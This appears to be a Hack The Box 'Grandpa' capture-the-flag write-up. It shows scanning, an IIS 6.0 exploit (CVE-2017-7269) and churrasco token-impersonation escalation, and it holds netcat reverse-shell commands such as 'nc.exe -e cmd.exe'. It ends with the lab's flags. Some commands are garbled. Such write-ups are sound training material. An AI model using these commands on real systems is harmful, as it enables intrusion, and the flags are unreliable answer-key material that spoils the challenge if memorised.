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File metadata and controls

90 lines (56 loc) · 2.33 KB

Grandpa - Easy

sudo vim /etc/hosts
#add grandpa.htb

nmap -T4 -p- -A -Pn -v grandpa.htb

gobuster dir -u http://grandpa.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,bak,js,txt,json,docx,pdf,zip,aspx,sql,xml -t 50

searchsploit microsoft iis 6.0
#we get exploits

nc -nvlp 4444

#run exploit
python grandpa.htb 80 4444

#this gives reverse shell

#copy output to file in attacker machine

#in attacker machine
vim sysinfo
#paste systeminfo

python2 --database 2022-11-13-mssb.xls --systeminfo sysinfo.txt

#in victim machine
#check privileges
whoami /priv

#churrasco exploit
#for file transfer

#in attacker machine share .

#in victim machine
cd C:\Windows\Temp

copy \\\share\nc.exe nc.exe

copy \\\share\churrasco.exe ch.exe

#setup listener
nc -nvlp 5555

#run exploit
.\ch.exe -d "C:\Windows\Temp\nc.exe -e cmd.exe 5555"

#this gives reverse shell
#system user
#flags can be found in "Documents and Settings"
  • Open ports & services:

    • 80 - Microsoft IIS httpd 6.0
  • The webpage shows that it is 'Under Construction', so we can check for other directories.

  • However, checking for other directories does not work as well because we get the message 'Directory Listing Denied'.

  • So, we can use searchsploit to check for any exploits for Micrsoft IIS 6.0, and we get many exploits.

  • Googling gives similar results for CVE-2017-7269.

  • On running the exploit, we get a reverse shell on our listener as 'network service' user.

  • We can use windows-exploit-suggester to check for vulnerabilities.

  • We can also check whoami /priv for privileges - this shows SeChangeNotify and SeImpersonate are enabled.

  • Googling for 'windows server 2003 seimpersonateprivilege' give us results related to "token kidnapping" privesc exploits.

  • This leads us to churrasco exploit; we can download the required files.

  • Now, we need to transfer 'churrasco.exe' and 'nc.exe' (x86 system) to victim machine; this can be done using

  • Once we share both files, we can simply setup listener and run exploit to get shell as system user.

1. User flag - bdff5ec67c3cff017f2bedc146a5d869

2. Root flag - 9359e905a2c35f861f6a57cecf28bb7b